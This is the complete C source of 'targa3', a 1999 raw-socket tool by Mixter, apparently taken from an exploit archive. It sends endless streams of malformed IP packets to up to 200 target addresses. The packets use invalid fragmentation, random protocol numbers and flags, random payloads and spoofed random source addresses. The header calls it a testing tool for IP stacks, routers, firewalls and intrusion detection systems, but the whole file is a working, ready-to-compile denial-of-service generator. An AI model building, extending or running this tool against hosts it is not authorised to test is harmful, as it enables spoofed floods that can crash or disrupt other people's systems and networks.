/* * targa3 - 1999 (c) Mixter * * IP stack penetration tool / 'exploit generator' * Sends combinations of uncommon IP packets to hosts * to generate attacks using invalid fragmentation, protocol, * packet size, header values, options, offsets, tcp segments, * routing flags, and other unknown/unexpected packet values. * Useful for testing IP stacks, routers, firewalls, NIDS, * etc. for stability and reactions to unexpected packets. * Some of these packets might not pass through routers with * filtering enabled - tests with source and destination host * on the same ethernet segment gives best effects. * * Example: * ./targa3 -c 1000 * * Linux, *BSD: * cc -Wall -O2 -s -o targa3 targa3.c * IRIX, HPUX, OSF (untested yet): * cc -ldld -o targa3 targa3.c * Solaris, SunOS: * cc -lnsl -lsocket -o targa3 targa3.c * */ #include #include #include #include #include #include #include #include #include #include u_char rseed[4096]; int rsi, rnd, pid; #if __BYTE_ORDER == __LITTLE_ENDIAN #ifndef htons unsigned short int htons (unsigned short int hostshort); #endif #define TONS(n) htons(n) #elif __BYTE_ORDER == __BIG_ENDIAN #define TONS(n) (n) #endif struct sa_in { unsigned short int sin_family, sin_port; struct { unsigned int s_addr; } sin_addr; unsigned char sin_zero[8]; }; struct iph { /* IP header */ #if __BYTE_ORDER == __LITTLE_ENDIAN #define TONS(n) htons(n) unsigned char ihl: 4; unsigned char version: 4; #elif __BYTE_ORDER == __BIG_ENDIAN #define TONS(n) (n) unsigned char version: 4; unsigned char ihl: 4; #endif unsigned char tos; unsigned short int tot_len; unsigned short int id; unsigned short int frag_off; unsigned char ttl; unsigned char protocol; unsigned short int check; unsigned int saddr; unsigned int daddr; }; unsigned long int inet_addr (const char *cp); unsigned int realrand (int low, int high) { int evil[2]; evil[0] = rseed[rsi]; evil[1] = rseed[rsi + 1]; rsi += 2; if (evil[0] == 0x00) evil[0]++; if (evil[1] == 0x00) evil[1]++; srandom (time (0)); srand (random () << pid % evil[0] >> evil[1]); /* don't ask :P */ return ((rand () % (int) (((high) + 1) - (low))) + (low)); } void sigh (int sig) { puts (" ] \n"); exit (0); } int main (int argc, char **argv) { int s = socket (AF_INET, SOCK_RAW, 255); /* IPPROTO_RAW */ int res, psize, loopy, targets = 0, tind, count = -1; char *packet, ansi[16]; struct sa_in sin; struct iph *ip; u_long target[200]; int proto[14] = { /* known internet protcols */ 0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0, }; int frags[10] = { /* (un)common fragment values */ 0, 0, 0, 8192, 0x4, 0x6, 16383, 1, 0, }; int flags[7] = { /* (un)common message flags */ 0, 0, 0, 0x4, 0, 0x1, }; rnd = open ("/dev/urandom", O_RDONLY); read (rnd, rseed, 4095); rsi = 0; snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7)); printf ("\t\t%starga 3.0 by Mixter\n", ansi); fflush (stdout); if (argc < 2) { fprintf (stderr, "usage: %s [ip2] ... [-c count]\n", argv[0]); exit (-1); } if (argc > 201) { fprintf (stderr, "cannot target more than 200 hosts!\n"); exit (-1); } for (loopy = 1; loopy < argc; loopy++) { if (strcmp (argv[loopy - 1], "-c") == 0) { if (atoi (argv[loopy]) > 1) count = atoi (argv[loopy]); continue; } if (inet_addr (argv[loopy]) != -1) { target[targets] = inet_addr (argv[loopy]); targets++; } } if (!targets) { fprintf (stderr, "no valid ips found!\n"); exit (-1); } snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7)); printf ("%s\tTargets:\t%d\n", ansi, targets); printf ("\tCount:\t\t"); if (count == -1) puts ("infinite"); else printf ("%d\n", count); printf (" [ "); fflush(0); for (res = 0; res < 18; res++) signal (res, sigh); pid = getpid (); psize = sizeof (struct iph) + realrand (128, 512); packet = calloc (1, psize); ip = (struct iph *) packet; setsockopt (s, 0, 3, "1", sizeof ("1")); /* IP_HDRINCL: header included */ sin.sin_family = PF_INET; sin.sin_port = TONS (0); while (count != 0) { if (count != -1) count--; for (loopy = 0; loopy < 0xff;) { for (tind = 0; tind < targets + 1; tind++) { sin.sin_addr.s_addr = target[tind]; if (rsi > 4000) { read (rnd, rseed, 4095); rsi = 0; } read (rnd, packet, psize); proto[13] = realrand (0, 255); frags[9] = realrand (0, 8100); flags[6] = realrand (0, 0xf); ip->version = 4; ip->ihl = 5; ip->tos = 0; ip->tot_len = TONS (psize); ip->id = TONS (realrand (1, 10000)); ip->ttl = 0x7f; ip->protocol = proto[(int) realrand (0, 13)]; ip->frag_off = TONS (frags[(int) realrand (0, 9)]); ip->check = 0; ip->saddr = random (); ip->daddr = target[tind]; res = sendto (s, packet, psize, flags[(int) realrand (0, 6)], (struct sockaddr *) &sin, sizeof (struct sockaddr)); if (res) loopy++; } } snprintf (ansi, 15, "[%d;3%dm", realrand (0, 1), realrand (1, 7)); printf ("%s.", ansi); usleep (200); fflush (stdout); } free (packet); /* free willy */ puts (" ]\n"); return 0; } /* www.hack.co.za [2000]*/